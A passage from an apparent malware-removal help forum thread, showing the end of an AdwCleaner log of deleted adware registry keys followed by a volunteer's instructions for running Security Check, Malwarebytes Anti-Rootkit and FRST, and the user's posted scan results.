[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C60D3D4E-3B20-5AB3-7F2C-9C946AD4080F}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CA8C94BE-9F47-1B2E-90F8-D8C07119BD96}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D831E399-50FE-84AE-F5F7-0A63AC282464}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F1422DAA-0829-09A1-7536-73936CAB8FFA}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FE139F4C-CE5B-121A-8A2D-191FA2226094}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DnsBasic
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverAgent_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\igsc
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PepperZip
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VideoPerformer
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader
[-] Key Deleted : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
[-] Key Deleted : [x64] HKLM\SOFTWARE\SearchModule
[-] Key Deleted : [x64] HKLM\SOFTWARE\Tarma Installer
[-] Key Deleted : [x64] HKLM\SOFTWARE\WebBar
[-] Key Deleted : [x64] HKLM\SOFTWARE\YTDownloader
[-] Key Deleted : HKU\.DEFAULT\Software\Browser
[-] Key Deleted : HKU\.DEFAULT\Software\IBUpdaterService
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\Object Browser
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\iWebar
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Object Browser
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\video MediaPlay-Air
[-] Key Deleted : HKU\S-1-5-19\Software\Browser
[-] Key Deleted : HKU\S-1-5-19\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKU\S-1-5-20\Software\Browser
[-] Key Deleted : HKU\S-1-5-20\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\A5900AE28AD765042A181FC92923C540
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\A5900AE28AD765042A181FC92923C540
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30C16B15B255BD349A1157B8A83E2AF9
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED1CAE30F47D14B41B5FC8FA53658044
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A5900AE28AD765042A181FC92923C540
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Itibiti.exe]
[-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [YTDownloader]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
[-] Key Deleted : HKCU\Software\Classes\PepperZip
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\BrowserHTM
 
***** [ Web browsers ] *****
 
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [55779 bytes] ##########
 


#13 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 05:23 PM

please set date and time on the infected pc to correct values:
http://www.bleepingcomputer.com/tutorials/how-to-change-the-date-and-time-in-windows/

---


:step1: Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
    Vista / Windows 7/8 users right-click and select Run As Administrator.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

***


:step2: Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Be sure to print out and follow the instructions provided on that same page.
  • Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click in the introduction screen "next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
With some infections, you may see two messages boxes.
  • 'Could not load protection driver'. Click 'OK'.
  • 'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
  • If malware is found - do not press the Clean up button, please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#14 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 06:02 PM

It says no malware was found. 

 

Clock and date has been set.
 
 Results of screen317's Security Check version 1.014 --- 12/23/15  
 Windows 7 Service Pack 1 x64 (UAC is enabled)  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
 Windows Firewall Disabled!  
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Spybot - Search & Destroy 
  Adobe Flash Player 18.0.0.209 Flash Player out of Date!  
 Google Chrome (47.0.2526.106) 
 Google Chrome (47.0.2526.111) 
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C: 1% 
````````````````````End of Log`````````````````````` 


#15 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 06:21 PM

FRST / FSRT64: run it again.
  • Right-click FRST / FSRT64 then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users